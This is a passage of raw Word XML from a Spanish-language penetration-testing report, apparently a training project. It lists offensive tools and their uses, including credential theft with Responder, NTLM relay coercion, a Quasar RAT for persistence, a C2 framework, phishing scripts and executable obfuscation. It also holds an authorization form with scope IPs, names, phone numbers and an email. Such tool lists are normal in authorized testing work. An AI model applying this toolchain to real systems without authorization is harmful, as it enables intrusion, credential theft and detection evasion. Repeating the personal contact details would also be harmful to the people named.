            <w:r w:rsidRPr="00E65638">
              <w:t>map escaneo de red</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0871F951" w14:textId="01EA15E1" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>N</w:t>
            </w:r>
            <w:r w:rsidRPr="00E65638">
              <w:t>essus escaneo de vulnerabilidades</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7113A3E2" w14:textId="409CF580" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>Herramienta responder https://github.com/lgandx/Responder para robo de credenciales en red.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="653B3947" w14:textId="6FFDBEF1" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>J</w:t>
            </w:r>
            <w:r w:rsidRPr="00E65638">
              <w:t xml:space="preserve">ohn the ripper para fuerza </w:t>
            </w:r>
            <w:r w:rsidR="00CB6A64" w:rsidRPr="00E65638">
              <w:t>bruta</w:t>
            </w:r>
            <w:r w:rsidRPr="00E65638">
              <w:t xml:space="preserve"> de credenciales.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14E8C060" w14:textId="4D4FD023" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>X</w:t>
            </w:r>
            <w:r w:rsidRPr="00E65638">
              <w:t>freerdp para conexión a escritorio remoto desde Linux</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AA3931C" w14:textId="40BD7811" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>Coerce, es un script para escalada de credenciales que abusa del protocolo MS-DFSNM</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="522B3EAE" w14:textId="05432543" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>PetitPotam, script para escalada de privilegios que abusa del protocolo MS-EFSRPC</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F283650" w14:textId="58397910" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>Ntlmrelayx de Impacket, PKINITtools, son necesarias para realizar la escalada de privilegios con el script de Coerce</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D098B8B" w14:textId="307D2B6E" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>Rubeus, Ntlmrelayx de Impacket para realizar la escalada de privilegios con el script de PetitPotam.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="704E68B0" w14:textId="474993E3" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>HTTP Rejetto (HFS) 2.3 (CVE-2014-6287CVE-2014-6287) para ganar acceso al sistema.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17E72DB3" w14:textId="08B55D77" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>CVE-2022-21999 SpoolFool Privesc para escalada de privilegios.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30F50402" w14:textId="257DF918" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>Shellter para ofuscar .EXE.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DFA15E7" w14:textId="4FC9CECA" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>Nginx, para crear un servidor http, igual que python3 -m http.server &lt;Puerto&gt;.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B314F5" w14:textId="2013B3BF" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>Quasar, que es un RAT, para ganar persistencia en el equipo.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21FBD859" w14:textId="13C407E5" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>Visual Estudio que sirve para compilar Quasar.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D25E1AC" w14:textId="60421598" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>Escritorio remoto para acceder a los equipos.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58807CFD" w14:textId="109DDAAB" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>Covenant que es un C2.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62551301" w14:textId="6F28C2F3" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>VMProyect para ofuscar .EXE .</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="021EE16B" w14:textId="366D1709" w:rsidR="00E65638" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t xml:space="preserve">Este script para ataques de phishing PhishMailer: </w:t>
            </w:r>
            <w:hyperlink r:id="rId60" w:history="1">
              <w:r w:rsidRPr="00AB2AF2">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                </w:rPr>
                <w:t>https://github.com/BiZken/PhishMailer</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3FB59A8A" w14:textId="2CBBFC1A" w:rsidR="00E65638" w:rsidRPr="003B28F2" w:rsidRDefault="00E65638" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t xml:space="preserve">Este script para ofuscar shellcode Nimcrypt2: </w:t>
            </w:r>
            <w:hyperlink r:id="rId61" w:history="1">
              <w:r w:rsidR="007E5306" w:rsidRPr="00AB2AF2">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                </w:rPr>
                <w:t>https://github.com/icyguider/Nimcrypt2</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6A8FC036" w14:textId="5D0272FB" w:rsidR="003B28F2" w:rsidRDefault="003B28F2" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>CrackMapExec para enviar comandos de PowerShell a una máquina del dominio.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="718C6573" w14:textId="77777777" w:rsidR="007E5306" w:rsidRDefault="007E5306" w:rsidP="007E5306">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="43111748" w14:textId="0A548689" w:rsidR="007E5306" w:rsidRDefault="007E5306" w:rsidP="007E5306">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>Generar un informe de auditoría y documentación detallada sobre el pentesting, vulnerabilidades encontradas y como defenderse,  procedimientos para explotar esas vulnerabilidades, instalación del contorno para realizar el pentesting.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62586601" w14:textId="5635CF09" w:rsidR="007E5306" w:rsidRDefault="007E5306" w:rsidP="007E5306">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>Este informe de auditoría constará de dos partes, un informe ejecutivo y uno técnico.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E3FA7EA" w14:textId="32E68811" w:rsidR="007E5306" w:rsidRDefault="007E5306" w:rsidP="007E5306">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>También se realizará una memoria con todo el proceso.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26A5288A" w14:textId="77777777" w:rsidR="007E5306" w:rsidRDefault="007E5306" w:rsidP="00F760CC"/>
          <w:p w14:paraId="426B864F" w14:textId="747FC3D8" w:rsidR="00F760CC" w:rsidRDefault="00F760CC" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
            </w:pPr>
            <w:bookmarkStart w:id="15" w:name="_Toc135575972"/>
            <w:r>
              <w:t>Formulario de autorización de pentesting</w:t>
            </w:r>
            <w:bookmarkEnd w:id="15"/>
          </w:p>
          <w:p w14:paraId="7782AFE3" w14:textId="1FC4A518" w:rsidR="00F760CC" w:rsidRPr="00F760CC" w:rsidRDefault="00F760CC" w:rsidP="00F760CC">
            <w:r>
              <w:t xml:space="preserve">   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="092097C8" w14:textId="636B29B8" w:rsidR="00F760CC" w:rsidRDefault="00F760CC" w:rsidP="00F760CC">
            <w:r>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E7CBEC5" w14:textId="0DAB5DFB" w:rsidR="00F760CC" w:rsidRDefault="00F760CC" w:rsidP="00F760CC">
            <w:r>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidRPr="00F760CC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cliente:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Google.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="353C209F" w14:textId="52B11B95" w:rsidR="00F760CC" w:rsidRDefault="00F760CC" w:rsidP="00F760CC">
            <w:r>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidRPr="00F760CC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Nombre:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Eva Lorenzo Casado</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05B82456" w14:textId="2805EAC8" w:rsidR="00F760CC" w:rsidRDefault="00F760CC" w:rsidP="00F760CC">
            <w:r>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidRPr="00F760CC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Puesto:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Gerente del área de ciberseguridad.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="355ABCA5" w14:textId="45AF9904" w:rsidR="00F760CC" w:rsidRDefault="00F760CC" w:rsidP="00F760CC">
            <w:r>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:r w:rsidRPr="00F760CC">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Fecha:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 20/05/2023</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33BBD4CE" w14:textId="77777777" w:rsidR="00F760CC" w:rsidRDefault="00F760CC" w:rsidP="00F760CC"/>
          <w:p w14:paraId="3CED2776" w14:textId="77777777" w:rsidR="00F760CC" w:rsidRDefault="00F760CC" w:rsidP="00F760CC">
            <w:r>
              <w:t xml:space="preserve">               Autoriza a Alesander S.L para llevar a cabo actividades de verificación de seguridad de las aplicaciones </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="660336C2" w14:textId="77777777" w:rsidR="00F760CC" w:rsidRDefault="00F760CC" w:rsidP="00F760CC">
            <w:r>
              <w:t xml:space="preserve">               Y sistemas que se describen a continuación:       </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F0E26B5" w14:textId="77777777" w:rsidR="0017057F" w:rsidRDefault="0017057F" w:rsidP="00F760CC"/>
          <w:p w14:paraId="710FA0AC" w14:textId="46C57BDE" w:rsidR="00F760CC" w:rsidRDefault="0017057F" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Ámbitos de pruebas de penetración:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29624ED2" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53BFE6AA" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
            <w:r>
              <w:t>Prueba de penetración sobre 3 equipos de la empresa Google, en sus sede en Madrid y del departamento de administración de ella, en esta prueba se permitirá realizar todo tipo de ataque sobre estos equipos antes mencionados en este acuerdo, tendremos acceso a la red local del departamento de Administración de Google, se nos permitirá acceder a 3 máquinas, en concreto será un Windows server 2019 con IP 192.168.1.79, otro Windows Server 2019 con IP 192.168.1.80 y una máquina Windows 10 20H2 con IP 192.168.1.135, en estas pruebas se nos permitirá realizar las pruebas sobre estos equipos mediante red, y físicamente.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0400DF6E" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="30882B78" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Estas serán las IPs y MACs con que realizaré las pruebas: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72F87062" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">192.168.1.44 con MAC: </w:t>
            </w:r>
            <w:r w:rsidRPr="0017057F">
              <w:t>C7-5C-DA-93-48-A0</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> .</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FFC5EFB" w14:textId="496CB7C6" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="3"/>
                <w:numId w:val="25"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>on MAC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0096248B">
              <w:t>08-E4-14-1D-7B-E5</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> .</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00FBB79E" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F3733E0" w14:textId="2B871123" w:rsidR="0017057F" w:rsidRDefault="0017057F" w:rsidP="0017057F">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="320DF315" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="0017057F">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66649FC3" w14:textId="779DAE9D" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Condiciones:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77C2217D" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0036E6F6" w14:textId="53986E00" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Las pruebas se realizarían en la misma red de la empresa, se realizará una prueba de caja </w:t>
            </w:r>
            <w:r w:rsidR="001209DE">
              <w:t>gris</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> y se podrán realizar pruebas ilimitadas dentro del tiempo establecido.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="230726B3" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="240B12A6" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08DDF61C" w14:textId="4E0CE320" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Teléfonos de soporte en caso de algún problema: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43F59AE6" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="16D73FFC" w14:textId="525993A9" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
            <w:r>
              <w:t>En caso del cliente:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C40B3A8" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A5212A8" w14:textId="6C2F3BE5" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
            <w:r>
              <w:t>Eva Lorenzo Casado, 698456123.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17541C49" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="435AD3AE" w14:textId="7DC5DEEE" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
            <w:r>
              <w:t>En caso de la empresa:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F96A3E" w14:textId="77777777" w:rsidR="004006F4" w:rsidRDefault="004006F4" w:rsidP="0017057F">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7FC6D53D" w14:textId="4FFE4D7E" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="0017057F">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
            <w:r>
              <w:t>Alesander Martínez Seijo, 622079858.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="533E6337" w14:textId="69EFBFED" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="0017057F">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Correo: </w:t>
            </w:r>
            <w:hyperlink r:id="rId62" w:history="1">
              <w:r w:rsidRPr="00AB2AF2">
                <w:rPr>
                  <w:rStyle w:val="Hipervnculo"/>
                </w:rPr>
                <w:t>sanderfene21789@gmail.com</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> .</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69405BBA" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="0017057F">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7613AB7E" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="0017057F">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="140DC80A" w14:textId="581E2365" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Documentación a entregar</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="004D8F0A" w14:textId="77777777" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38A3301C" w14:textId="2DA2C92E" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="001D222D">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:ind w:left="1080"/>
            </w:pPr>
            <w:r>
              <w:t>Se entregará la memoria de las pruebas realizadas en PDF, un informe ejecutivo y otro técnico en el mismo PDF de la memoria.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69AA14CF" w14:textId="77777777" w:rsidR="00F760CC" w:rsidRDefault="00F760CC" w:rsidP="00F760CC"/>
          <w:p w14:paraId="11B0F698" w14:textId="03460323" w:rsidR="001D222D" w:rsidRDefault="001D222D" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
            </w:pPr>
            <w:bookmarkStart w:id="16" w:name="_Toc135575973"/>
            <w:r>
              <w:t>Tipos de pruebas</w:t>
            </w:r>
            <w:bookmarkEnd w:id="16"/>
          </w:p>
          <w:p w14:paraId="3F7AC37E" w14:textId="41C398BD" w:rsidR="003E7CC9" w:rsidRDefault="003E7CC9" w:rsidP="003E7CC9">
            <w:pPr>
              <w:ind w:left="720"/>
            </w:pPr>
            <w:r>
              <w:t>Se utilizaron técnicas de pentresting estándar para realizar las pruebas, incluyendo el escaneo de puertos, la enumeración de servicios, la identificación de vulnerabilidades conocidas, la simulación de ataques de fuerza bruta y la realización de pruebas de penetración. Se coordino el personal de Administración de la empresa para minimizar riesgos y evitar interrupciones en el trabajo normal de la empresa. Se tomaron medidas para garantizar la seguridad de los durante las pruebas.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56C21223" w14:textId="7F8D3C3F" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="003E7CC9"/>
          <w:p w14:paraId="1763C903" w14:textId="7A1D1854" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00DE6A95">
            <w:pPr>
              <w:pStyle w:val="Prrafodelista"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="00E65638">
              <w:t>HTTP Rejetto (HFS) 2.3 (CVE-2014-6287CVE-2014-6287) para ganar acceso al sistema.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="776CEB09" w14:textId="77777777" w:rsidR="00CB6A64" w:rsidRDefault="00CB6A64" w:rsidP="00CB6A64">
            <w:pPr>
